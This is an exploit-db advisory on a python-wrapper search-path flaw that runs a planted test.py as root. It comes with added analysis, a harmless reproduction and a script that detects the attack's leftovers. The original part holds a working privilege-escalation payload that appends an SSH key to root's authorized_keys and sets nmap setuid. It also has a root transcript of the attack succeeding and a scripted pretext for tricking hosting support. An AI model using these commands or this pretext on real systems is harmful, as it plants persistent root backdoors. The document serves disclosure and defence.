python-wrapper – Untrusted Search Path/Code Execution

  • Author: ShadowHatesYou
    Date: 2012-07-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/19523/
  • # python-wrapper untrusted search path/code execution vulnerability
    #
    # python-wrapper executes any test.py script found in the current working directory when help('modules') is entered at its prompt.
    # A non-privileged user may therefore gain code execution as root by tricking root into entering help('modules') (or help() and
    # then "modules") inside python-wrapper while root's current working directory is the non-privileged user's work directory.
    #
    # The malicious file MUST be named test.py. A call such as os.system("evilcommand") in it results in python-wrapper running that
    # command and then continuing normally, with no sign of compromise as long as you redirect the command's output.
    # os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not work, however
    # os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
    #
    #
    # Additionally, nmap makes a great backdoor from a non-privileged user account, because it is something that looks like you might
    # actually want setuid under certain circumstances, but not really (and it will bitch if invoked). In nmap 5.31DC1 the most useful
    # switch (--interactive) was removed; it previously allowed you to bang out a shell (!/bin/csh, but not bash).
    # Thank you David/Juan Carlos Castro for breaking one of my favorites. NOW, however, there is the nmap scripting engine to exploit.
    # As usual, its input/output commands will behave like those of any exploitable setuid program that has input/output commands.
    #
    #
    # A practical example of how this vulnerability could be useful is an attack on a shared web-hosting environment.
    # After convincing root (support) to cd into your directory, perhaps by uploading a broken "distraction.py" and getting him to
    # troubleshoot it, you could pose the question: "Hey, what Python modules do you guys have installed?" "I'm not quite sure how to
    # list that..." "You can list the installed modules by entering python-wrapper and typing help('modules')" "Oh!"
    # *silent execution of test.py by root* "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks.
    # I think I'll look at that and try troubleshooting this more myself".
    #
    #
    # - ShadowHatesYou (Shadow@SquatThis.net)
    # 6/30/12
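The advisory reports the symptom (a cwd test.py runs during help('modules')) but not the mechanism. My reading of it, which the advisory itself does not state, is the search order: the interactive interpreter places '' (the current directory) at sys.path[0], and pydoc's module scan enumerates packages with pkgutil.walk_packages(), which imports each package it lists in order to descend into it. Importing the standard library's `test` package by bare name with the cwd first on sys.path resolves to ./test.py instead. By the same reading any top-level package name the scan imports that is not already in sys.modules would serve, but the page demonstrates only test.py. The Python 3 script below is an added example, not the author's code, and reproduces the effect on two constructed directories (`lib/` standing in for the interpreter's library, `attacker/` for the untrusted cwd, with a package named `shadowed` standing in for `test`) so that nothing on the real system gets imported.

```python
"""Added example, not the advisory's code: reproduce the search-path problem
behind help('modules') with pkgutil.walk_packages(), the primitive pydoc's
module scanner is built on. Constructed layout:
  lib/shadowed/__init__.py   a genuine package, as the stdlib `test` package is
  attacker/shadowed.py       the planted module, as the advisory's cwd test.py
walk_packages([lib]) lists `shadowed` as a package and then imports it by bare
name to walk its subpackages; the import is resolved through sys.path, so the
directory that sits first wins."""
import importlib
import os
import pkgutil
import shutil
import sys
import tempfile

PKG = "shadowed"   # stands in for the stdlib `test` package named in the advisory


def build_fixture(root):
    """Create lib/<PKG>/__init__.py and attacker/<PKG>.py under root."""
    lib = os.path.join(root, "lib")
    attacker = os.path.join(root, "attacker")
    os.makedirs(os.path.join(lib, PKG))
    os.makedirs(attacker)
    with open(os.path.join(lib, PKG, "__init__.py"), "w") as f:
        f.write("SOURCE = 'lib'\n")
    # The planted module only drops a marker file; the advisory's test.py
    # appended an SSH key and set the setuid bit on nmap at this point.
    with open(os.path.join(attacker, PKG + ".py"), "w") as f:
        f.write("import os\n"
                "SOURCE = 'attacker'\n"
                "open(os.path.join(os.path.dirname(__file__), 'RAN'), 'w').close()\n")
    return lib, attacker


def scan_like_pydoc(lib):
    """Enumerate lib/ the way pydoc does; the walk imports every package it lists."""
    return [name for _importer, name, _ispkg in pkgutil.walk_packages([lib])]


def run(cwd_first):
    """cwd_first=True mimics the REPL's '' entry at sys.path[0]; False mimics
    python -P / PYTHONSAFEPATH (3.11+) or `del sys.path[0]` before help()."""
    root = tempfile.mkdtemp()
    lib, attacker = build_fixture(root)
    saved_path = list(sys.path)
    sys.modules.pop(PKG, None)
    try:
        sys.path[:] = ([attacker] if cwd_first else []) + [lib] + saved_path
        importlib.invalidate_caches()
        listed = PKG in scan_like_pydoc(lib)
        mod = sys.modules.get(PKG)
        return {
            "listed": listed,                                   # the scan lists it either way
            "source": getattr(mod, "SOURCE", None),             # which file actually executed
            "marker_dropped": os.path.exists(os.path.join(attacker, "RAN")),
        }
    finally:
        sys.path[:] = saved_path
        sys.modules.pop(PKG, None)
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("cwd first :", run(True))    # source='attacker', marker dropped
    print("safe path :", run(False))   # source='lib', no marker
```

The listing is identical in both runs, which is why the advisory's victim sees nothing unusual; only the second run, with the cwd kept off sys.path, leaves the planted file unexecuted. That is the mitigation on the root side: do not call help() from an untrusted directory with '' on sys.path, which `python -P` or PYTHONSAFEPATH enforces on 3.11 and later.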
    
    root@tourian:/home/shadow/python# ls -hl test.py
    -rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
    root@tourian:/home/shadow/python# cat test.py
    #!/bin/python
    import os
    os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')
    
    root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
    -rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
    root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
    ls: cannot access /root/.ssh/authorized_keys: No such file or directory
    root@tourian:/home/shadow/python# python-wrapper
    Python 2.7.3 (default, May 4 2012, 00:13:26)
    [GCC 4.6.2] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> help('modules')
    
    Please wait a moment while I gather a list of all available modules...
    
    
    ArgImagePlugin      _bisect           email               pprint
    BaseHTTPServer      _codecs           encodings           pptransport
    Bastion             _codecs_cn        errno               ppworker
    BdfFontFile         _codecs_hk        exceptions          profile
    BeautifulSoup       _codecs_iso2022   fcntl               pstats
    BeautifulSoupTests  _codecs_jp        filecmp             pty
    BitTornado          _codecs_kr        fileinput           pwd
    BmpImagePlugin      _codecs_tw        fnmatch             py_compile
    BufrStubImagePlugin _collections      formatter           pyclbr
    CDROM               _cracklib         fpformat            pydoc
    CGIHTTPServer       _csv              fractions           pydoc_data
    ConfigParser        _ctypes           ftplib              pyexpat
    ContainerIO         _ctypes_test      functools           pyrit_cli
    Cookie              _curses           future_builtins     pyximport
    Crypto              _curses_panel     gamin               quopri
    CurImagePlugin      _elementtree      gc                  random
    Cython              _emerge           gdbm                re
    DLFCN               _functools        genericpath         readline
    DcxImagePlugin      _gamin            gentoolkit          repoman
    DocXMLRPCServer     _gv               getopt              repr
    EpsImagePlugin      _hashlib          getpass             resource
    ExifTags            _heapq            gettext             rexec
    FitsStubImagePlugin _hotshot          git_remote_helpers  rfc822
    FliImagePlugin      _imaging          glob                rlcompleter
    FontFile            _imagingft        grp                 robotparser
    FpxImagePlugin      _imagingmath      gv                  rrdtool
    GbrImagePlugin      _io               gzip                runpy
    GdImageFile         _json             hashlib             scapy
    GifImagePlugin      _lcms             heapq               sched
    GimpGradientFile    _ldns             hmac                scipy
    GimpPaletteFile     _locale           hotshot             select
    GribStubImagePlugin _lsprof           htmlentitydefs      sets
    HTMLParser          _md5              htmllib             setuptools
    Hdf5StubImagePlugin _multibytecodec   httplib             sgmllib
    IN                  _multiprocessing  ihooks              sha
    IcnsImagePlugin     _pyio             imaplib             shelve
    IcoImagePlugin      _random           imghdr              shlex
    ImImagePlugin       _sha              imp                 shutil
    Image               _sha256           importlib           signal
    ImageChops          _sha512           imputil             site
    ImageCms            _socket           inspect             smtpd
    ImageColor          _sre              io                  smtplib
    ImageDraw           _ssl              itertools           sndhdr
    ImageDraw2          _strptime         java_config_2       socket
    ImageEnhance        _struct           javatoolkit         spwd
    ImageFile           _symtable         json                sre
    ImageFileIO         _testcapi         keyword             sre_compile
    ImageFilter         _threading_local  lcms                sre_constants
    ImageFont           _unbound          ldns                sre_parse
    ImageGL             _warnings         ldnsx               ssl
    ImageGrab           _weakref          lib2to3             stat
    ImageMath           _weakrefset       libsvn              statvfs
    ImageMode           _xmlplus          libxml2             string
    ImageOps            abc               libxml2mod          stringold
    ImagePalette        aifc              libxslt             stringprep
    ImagePath           antigravity       libxsltmod          strop
    ImageQt             anydbm            linecache           struct
    ImageSequence       argparse          linuxaudiodev       subprocess
    ImageShow           array             locale              sunau
    ImageStat           ast               logging             sunaudio
    ImageTk             asynchat          lxml                svn
    ImageTransform      asyncore          macpath             symbol
    ImageWin            atexit            macurl2path         symtable
    ImtImagePlugin      audiodev          magic               sys
    IptcImagePlugin     audioop           mailbox             sysconfig
    JpegImagePlugin     base64            mailcap             syslog
    McIdasImagePlugin   bdb               markupbase          tabnanny
    MicImagePlugin      binascii          marshal             tarfile
    MimeWriter          binhex            math                telnetlib
    MpegImagePlugin     bisect            md5                 tempfile
    MspImagePlugin      bs4               mhlib               termios
    OleFileIO           bz2               mimetools           test
    OpenIPMI            cPickle           mimetypes           textwrap
    PAM                 cProfile          mimify              this
    PIL                 cStringIO         mirrorselect        thread
    PSDraw              calendar          mmap                threading
    PaletteFile         cgi               modulefinder        time
    PalmImagePlugin     cgitb             multifile           timeit
    PcdImagePlugin      chunk             multiprocessing     toaiff
    PcfFontFile         cmath             mutex               token
    PcxImagePlugin      cmd               netrc               tokenize
    PdfImagePlugin      code              netsnmp             trace
    PixarImagePlugin    codecs            new                 traceback
    PngImagePlugin      codeop            nis                 tty
    PpmImagePlugin      collections       nntplib             types
    PsdImagePlugin      colorsys          ntpath              unbound
    Queue               commands          nturl2path          unboundmodule
    SgiImagePlugin      compileall        numbers             unicodedata
    SimpleHTTPServer    compiler          numpy               unittest
    SimpleXMLRPCServer  contextlib        opcode              urllib
    SocketServer        cookielib         operator            urllib2
    SpiderImagePlugin   copy              optparse            urlparse
    StringIO            copy_reg          os                  user
    SunImagePlugin      cpyrit            os2emxpath          uu
    TYPES               cracklib          ossaudiodev         uuid
    TarIO               crypt             paramiko            warnings
    TiffImagePlugin     ctypes            pdb                 weakref
    TiffTags            curses            pickle              webbrowser
    UserDict            cython            pickletools         whichdb
    UserList            datetime          pipes               wsgiref
    UserString          dbm               pkg_resources       xattr
    WalImageFile        decimal           pkgutil             xcbgen
    WmfImagePlugin      difflib           platform            xdelta3main
    XVThumbImagePlugin  dircache          plistlib            xdrlib
    XbmImagePlugin      dis               popen2              xen
    XpmImagePlugin      distutils         poplib              xml
    _LWPCookieJar       dnet              portage             xmllib
    _MozillaCookieJar   doctest           posix               xmlrpclib
    _OpenIPMI           drv_libxml2       posixfile           xxsubtype
    __builtin__         dumbdbm           posixpath           yasm
    __future__          dummy_thread      pp                  zipfile
    _abcoll             dummy_threading   ppauto              zipimport
    _ast                easy_install      ppcommon            zlib
    
    Enter any module name to get more help. Or, type "modules spam" to search
    for modules whose descriptions contain the word "spam".
    
    >>> quit()
    root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
    -rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
    root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys
    ssh-rss pwned byshadow
    
    
    # Wish I had DuoSecurity!
    # See you at Defcon!
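The transcript leaves two artifacts behind: a setuid-root /usr/bin/nmap and a foreign line in /root/.ssh/authorized_keys. The Python 3 script below is an added example, not part of the advisory, showing the two checks a responder would run for them: setuid files compared against a baseline of paths that are expected to be setuid, and authorized_keys entries compared on the key body rather than the comment, since the comment ("yourkeycomment", "byshadow") is whatever the attacker wrote. It runs against a constructed temp tree; the `root` argument and the baseline and allowlist contents are placeholders for the real filesystem and a known-good list taken from the package manager or a clean host.

```python
"""Added example, not the advisory's code: the two triage checks for what the
transcript leaves behind. Runs on a constructed temp tree; on a real host pass
root="/" and a baseline/allowlist built from the package manager or a known-good
system."""
import os
import shutil
import stat
import tempfile


def setuid_files(root):
    """Root-relative paths of regular files under root with the setuid bit set
    (symlinks are not followed, so a link to a setuid file is not double-counted)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def unexpected_setuid(root, baseline):
    """Setuid files not in baseline, a set of root-relative paths expected to be
    setuid. nmap does not belong in any sane baseline."""
    return [p for p in setuid_files(root) if p not in baseline]


def parse_authorized_keys(text):
    """(keytype, keybody, comment) per entry. Skips blanks and '#' comments and
    tolerates a leading options field such as command="..."; a line with no
    recognisable key type is returned as ('?', '', line) so it is not lost."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, field in enumerate(fields):
            if field.startswith(("ssh-", "ecdsa-", "sk-")):
                body = fields[i + 1] if i + 1 < len(fields) else ""
                entries.append((field, body, " ".join(fields[i + 2:])))
                break
        else:
            entries.append(("?", "", line))
    return entries


def unexpected_keys(text, allowed_bodies):
    """Entries whose base64 body is not in allowed_bodies. Matching on the body
    rather than the comment matters: the comment is attacker-chosen."""
    return [e for e in parse_authorized_keys(text) if e[1] not in allowed_bodies]


def demo():
    """Constructed fixture: a setuid nmap (planted), a setuid passwd (legitimate),
    and an authorized_keys holding one known key plus the line the transcript appended."""
    root = tempfile.mkdtemp()
    try:
        for rel in ("usr/bin/nmap", "usr/bin/passwd"):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()
            os.chmod(path, 0o4755)
        keys = ("# root's keys\n"
                "ssh-rsa AAAAB3NzaKNOWNKEYBODY admin@host\n"   # constructed known key
                "ssh-rss pwned byshadow\n")                   # the injected line
        return (unexpected_setuid(root, {"usr/bin/passwd"}),
                unexpected_keys(keys, {"AAAAB3NzaKNOWNKEYBODY"}))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    suid, keys = demo()
    print("setuid not in baseline:", suid)      # ['usr/bin/nmap']
    print("keys not in allowlist :", keys)      # [('ssh-rss', 'pwned', 'byshadow')]
```

On a live host the baseline should come from outside the host (package-manager metadata or a clean reference system), since an attacker who can make nmap setuid can also edit a baseline file stored locally.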